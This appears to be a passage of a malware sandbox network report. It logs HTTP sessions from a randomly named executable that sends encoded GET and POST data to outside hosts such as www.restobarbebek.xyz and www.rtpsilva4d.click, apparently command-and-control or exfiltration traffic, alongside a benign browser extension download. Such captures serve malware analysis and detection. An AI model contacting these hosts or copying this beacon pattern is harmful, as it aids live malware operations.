                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 4a 2b 47 71 6b 78 5a 47 78 6b 43 56 75 48 6c 6d 71 6b 31 4a 56 64 43 44 33 69 46 75 58 69 64 50 72 57 53 36 39 6b 37 49 69 70 74 75 2b 31 75 37 58 6e 53 63 45 2f 2b 55 72 38 2b 51 41 38 4c 73 79 66 34 6e 79 34 75 61 6c 68 4a 70 48 66 6b 76 49 43 30 68 69 78 2b 63 6e 58 61 6d 31 6f 46 71 42 6d 55 4f 42 63 6e 6e 47 66 65 51 5a 73 6b 44 55 30 56 32 4e 2b 4c 42 4b 6a 5a 38 31 47 73 65 6b 34 79 36 64 2f 38 4b 33 41 4e 59 38 48 73 36 76 6b 6b 74 43 4d 45 69 72 5a 35 39 46 75 4e 37 54 62 54 4d 74 47 45 6d 37 34 78 36 47 4d 38 44 31 5a 6d 63 67 36 34 6e 78 45 7a 59 62 4e 73 32 79 67 4f 48 64 4b 44 4e 72 58 58 63 6a 42 31 4c 51 32 36 57 69 45 76 44 63 4e 57 43 58 75 78 65 4a 6b 7a 4a 43 49 62 70 44 64 36 5a 48 6e 4c 59 4f 79 4b 61 66 68 57 36 6a 59 57 2f 6a 4e 61 75 47 6a 58 61 58 67 52 4f 4c 53 51 77 75 65 31 42 4b 55 65 35 30 55 4b 61 68 58 58 43 34 6f 53 44 50 32 67 65 50 59 76 45 54 73 6c 79 4b 73 6d 35 77 37 43 6a 50 53 6d 47 41 6b 41 6a 4f 37 79 52 52 59 5a 47 77 4f 50 4c 59 [TRUNCATED]
                                                                                                                                                                            Data Ascii: x6lPJLCP=J+GqkxZGxkCVuHlmqk1JVdCD3iFuXidPrWS69k7Iiptu+1u7XnScE/+Ur8+QA8Lsyf4ny4ualhJpHfkvIC0hix+cnXam1oFqBmUOBcnnGfeQZskDU0V2N+LBKjZ81Gsek4y6d/8K3ANY8Hs6vkktCMEirZ59FuN7TbTMtGEm74x6GM8D1Zmcg64nxEzYbNs2ygOHdKDNrXXcjB1LQ26WiEvDcNWCXuxeJkzJCIbpDd6ZHnLYOyKafhW6jYW/jNauGjXaXgROLSQwue1BKUe50UKahXXC4oSDP2gePYvETslyKsm5w7CjPSmGAkAjO7yRRYZGwOPLYmCFPTpzLmCGqVXr/zEbZfsWf4fS3D2tPf/JgkvIhZlZLPH46DZ893PtnYK6joj8QDo1ge2AdOihI/IH+y7Ya59y/wSoBLtRvtRBgjRFMwBFhM43U+gslfszR8PnTss43l34pbTqEjDEmGChbkRctB+DyZJm+EEfS+b9+QIOPL6Hq3D4LfI7uuQ9N0+9XijFwfS6CjKhf+RlkPnhYOR0uUeXyjiHjF+zOK6nCVwitVPwpx886ANGWiQ9jBAxcBuciHk02zg5UUI+YB9N8WzVAWy7wcddgOyMOdExMHh8B+P+3PtbzxJkjK7z6vVqFgmsTlwlZDhXMTl6mizb88XfC43KEzAu3O9eqUzFtFVr8JVULsd3PqMeac11TIMAopQbzhepekTcYRFHjsb2SxvLV7wc6x7qReZ05zvzjYaOm1MxPjf70XVNJpUlA4kxAKqNQ7AD9q9YrYls+ypKlKVn4cTXaFC9znrYdVkzv+SBFRCw2m77epS2/aEptqgmpTTi8kICRLt4eY8tGElLQ5Qdz/e76TMxjtT//dey+uxiVfmZdAR+MyqLXFREQ9kYnvblXC01jXIHxnHcJKulQTSOoOe5dAJYV4bSodggm71dufcdQ75IcnT6FgCoVtnc295IlpY4OTPYEtLTl80jRlIvrVQpOlVvkovy1R1 [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:42:43.792836905 CET479INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:42:43 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 315
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            36192.168.2.55012367.223.117.169804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:42:45.171138048 CET552OUTGET /mbcs/?x6lPJLCP=E8uKnHhByG2Tv3dXt0hUXbTg8EJLb11h3Xjfw3eru7l4vir7amLvL6eqi8CHILvLkZwm8qiwgwp5C/0JAU8dkG6IkADn3bpuAlwPLI3cNsyNCOAib3p0DeKOekQmhkdC2g==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.rtpsilva4d.click
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Dec 11, 2024 09:42:46.377219915 CET479INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:42:46 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 315
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            37192.168.2.55012485.159.66.93804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:42:52.593290091 CET819OUTPOST /jm9b/ HTTP/1.1
                                                                                                                                                                            Host: www.restobarbebek.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.restobarbebek.xyz
                                                                                                                                                                            Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 61 71 35 73 6d 6d 39 4b 7a 32 74 57 35 41 63 43 42 58 43 38 47 45 57 5a 33 66 4f 70 33 75 70 4c 4a 2b 4c 38 61 4f 71 77 63 44 6f 6e 54 70 59 76 45 2b 5a 4c 79 75 32 5a 44 36 52 42 6a 78 58 61 73 50 61 78 4f 46 52 64 33 4f 58 50 36 75 71 54 7a 6a 30 57 68 43 6d 37 32 2f 6c 61 75 68 5a 53 51 55 76 4e 53 77 32 50 6e 46 78 70 79 62 44 42 62 6c 58 32 70 36 59 45 51 79 62 45 5a 62 37 69 6f 39 33 6f 61 50 54 67 5a 4a 61 6b 32 79 33 4e 38 62 4d 68 57 56 69 58 37 35 36 70 4b 78 79 2b 47 65 71 6a 2f 35 43 48 67 48 58 69 53 53 4a 46 42 67 39 30 68 4f 42 71 75 66 49 51 38 64 69 57 42 53 45 6e 42 31 6f 3d
                                                                                                                                                                            Data Ascii: x6lPJLCP=aq5smm9Kz2tW5AcCBXC8GEWZ3fOp3upLJ+L8aOqwcDonTpYvE+ZLyu2ZD6RBjxXasPaxOFRd3OXP6uqTzj0WhCm72/lauhZSQUvNSw2PnFxpybDBblX2p6YEQybEZb7io93oaPTgZJak2y3N8bMhWViX756pKxy+Geqj/5CHgHXiSSJFBg90hOBqufIQ8diWBSEnB1o=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            38192.168.2.55012585.159.66.93804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:42:55.239033937 CET839OUTPOST /jm9b/ HTTP/1.1
                                                                                                                                                                            Host: www.restobarbebek.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.restobarbebek.xyz
                                                                                                                                                                            Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 61 71 35 73 6d 6d 39 4b 7a 32 74 57 6f 51 4d 43 48 30 36 38 41 6b 57 65 34 2f 4f 70 2b 4f 70 48 4a 2b 48 38 61 4c 4b 65 64 77 63 6e 53 4d 38 76 46 36 4e 4c 38 4f 32 5a 4d 71 52 41 75 52 58 45 73 50 57 44 4f 45 39 64 33 4f 44 50 36 73 69 54 7a 55 49 58 75 79 6d 35 33 50 6c 59 78 78 5a 53 51 55 76 4e 53 32 61 78 6e 46 35 70 79 71 7a 42 64 77 6a 78 31 71 59 48 64 69 62 45 64 62 37 6d 6f 39 32 4e 61 4f 4f 4c 5a 4b 79 6b 32 79 48 4e 38 4b 4d 69 59 56 69 5a 6a 5a 37 45 4e 41 53 32 66 4f 2f 75 36 6f 48 68 30 78 66 2b 58 6b 34 76 62 43 31 63 79 75 74 53 2b 4d 41 6e 74 74 44 2f 62 78 55 58 66 69 38 31 6d 55 38 68 4d 69 6e 6e 76 77 44 78 38 62 54 64 37 6f 64 58
                                                                                                                                                                            Data Ascii: x6lPJLCP=aq5smm9Kz2tWoQMCH068AkWe4/Op+OpHJ+H8aLKedwcnSM8vF6NL8O2ZMqRAuRXEsPWDOE9d3ODP6siTzUIXuym53PlYxxZSQUvNS2axnF5pyqzBdwjx1qYHdibEdb7mo92NaOOLZKyk2yHN8KMiYViZjZ7ENAS2fO/u6oHh0xf+Xk4vbC1cyutS+MAnttD/bxUXfi81mU8hMinnvwDx8bTd7odX


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            39192.168.2.55012685.159.66.93804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:42:57.893518925 CET1760OUTPOST /jm9b/ HTTP/1.1
                                                                                                                                                                            Host: www.restobarbebek.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.restobarbebek.xyz
                                                                                                                                                                            Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 61 71 35 73 6d 6d 39 4b 7a 32 74 57 6f 51 4d 43 48 30 36 38 41 6b 57 65 34 2f 4f 70 2b 4f 70 48 4a 2b 48 38 61 4c 4b 65 64 78 6b 6e 53 36 67 76 48 64 68 4c 39 4f 32 5a 4b 61 52 46 75 52 57 42 73 4d 6d 39 4f 45 41 69 33 49 50 50 37 4a 32 54 31 67 63 58 31 69 6d 35 38 76 6c 64 75 68 59 59 51 51 4c 33 53 77 36 78 6e 46 35 70 79 6f 72 42 4c 56 58 78 6d 61 59 45 51 79 62 41 5a 62 37 4f 6f 39 2f 77 61 4f 62 77 5a 37 53 6b 32 57 6a 4e 35 34 6b 69 51 56 69 62 67 5a 37 63 4e 41 66 6f 66 50 53 64 36 6f 69 47 30 32 54 2b 55 43 63 78 4f 47 78 48 74 76 34 79 77 37 4d 38 38 70 66 36 46 58 46 6a 63 42 64 50 6d 56 6b 2b 4b 46 50 6b 35 54 6a 68 2b 63 72 55 32 2f 34 2f 2b 66 48 36 53 38 74 51 56 48 2b 6b 61 61 77 2b 68 36 49 56 79 67 6d 6c 72 35 6a 6c 68 74 52 59 6d 71 49 77 72 5a 72 63 36 68 4b 43 62 75 33 42 7a 52 6a 66 58 54 48 62 48 48 72 76 39 45 4d 41 39 77 45 79 7a 55 67 35 36 30 51 78 51 45 50 61 2b 4f 32 75 45 46 31 35 58 31 57 6f 50 57 79 35 55 6a 61 64 31 7a 48 6c 38 4f 2f 59 73 [TRUNCATED]
                                                                                                                                                                            Data Ascii: x6lPJLCP=aq5smm9Kz2tWoQMCH068AkWe4/Op+OpHJ+H8aLKedxknS6gvHdhL9O2ZKaRFuRWBsMm9OEAi3IPP7J2T1gcX1im58vlduhYYQQL3Sw6xnF5pyorBLVXxmaYEQybAZb7Oo9/waObwZ7Sk2WjN54kiQVibgZ7cNAfofPSd6oiG02T+UCcxOGxHtv4yw7M88pf6FXFjcBdPmVk+KFPk5Tjh+crU2/4/+fH6S8tQVH+kaaw+h6IVygmlr5jlhtRYmqIwrZrc6hKCbu3BzRjfXTHbHHrv9EMA9wEyzUg560QxQEPa+O2uEF15X1WoPWy5Ujad1zHl8O/Ys2O+jMeY7UnETV7YJdR6t/dKq/69253uMxGXQQcHBJQKm2MYmURVGw/AUWqAeU/wvx/cRFpZxEAQuOez7GEP5N46o0Nz+wwxe7YwSmSQycp+2Ei80GTGbE7QMBqQc8nfox0iyzbyvfSDVdnFBMtOvgJqRPsik5XKyI/piIF8+JyfB6Uv4gIVAmFS+pA/owtTkS56AfsEO8KbqUfLyZUhNCoIz10RaqvZrQcsNKMudadajtdCLW7QlbEsEGyI3vqKp7SiChXEkaR/HDDbw1bhiFD0WIpZyuc2SdPjb7dDSrDt5/ouBtqu6W7IqnzCtferOMyMGo34O+WTrXagLAUnp0gLKwI8YjXwSp4BKOlwY155mBIkNQupMWMGmkiDV/CpsQo0TgGlINM+NHByPJlcYoxi2QBHPCNZysw+ybaSA1isGAwE0MVTVbc/KBOBv7JMbAvSInnN1MwaRPUp8OIxAI9U/pp4gMphQZdQUIuP8aOJ7RpBcgvxQmOgKlIm0vdS/rpPPe4YwRvQyXwO/B/c6XRZbaX0GSQPFUEK5/tS4GPSjvE1d4Hk3rOfSA/jxBobyim3VyQkXSk6w8YBw1qgPhdNjOOtIw5NMuCOsO7lxNgJ+GJOE5C9AxLV1vwhUw4NFhODp+bprj0CNJs/wR1xwCj2JSbSNq488ig [TRUNCATED]


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            40192.168.2.55012785.159.66.93804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:43:00.543303967 CET553OUTGET /jm9b/?x6lPJLCP=XoRMlRQavUBSvHE6AV2eFSHD1vC94NgmQfaFO5StTzEKBs4nBsZa6I2TGaV3pACayJ+XHXZH2+vi6MzB3UVztjakyssOm3dqQA7FXQmUsXh8tqb4LmqnuepmKmLDXrWJpg==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.restobarbebek.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Dec 11, 2024 09:43:01.878988981 CET225INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:43:01 GMT
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                                                                                            X-Rate-Limit-Reset: 2024-12-11T08:43:06.6549188Z


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            0192.168.2.549790172.217.19.2254433648C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:39:46 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                            Host: clients2.googleusercontent.com
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                            2024-12-11 08:39:47 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 138356
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4J6TCUHaB4vHZh0xUuNyuZTRP74OTuNvyhfX-3NnOS1BLi6LlEqdKyjB_ciY1UI5FxAAbinHU
                                                                                                                                                                            X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Date: Tue, 10 Dec 2024 16:45:00 GMT
                                                                                                                                                                            Expires: Wed, 10 Dec 2025 16:45:00 GMT
                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                            Age: 57287
                                                                                                                                                                            Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                            ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                            Content-Type: application/x-chrome-extension
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-11 08:39:47 UTC820INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                            Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                            2024-12-11 08:39:47 UTC1390INData Raw: 56 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c 7c a7 3d
                                                                                                                                                                            Data Ascii: V_q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\|=
                                                                                                                                                                            2024-12-11 08:39:47 UTC1390INData Raw: c8 fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc 55 5e 3d
                                                                                                                                                                            Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FSU^=
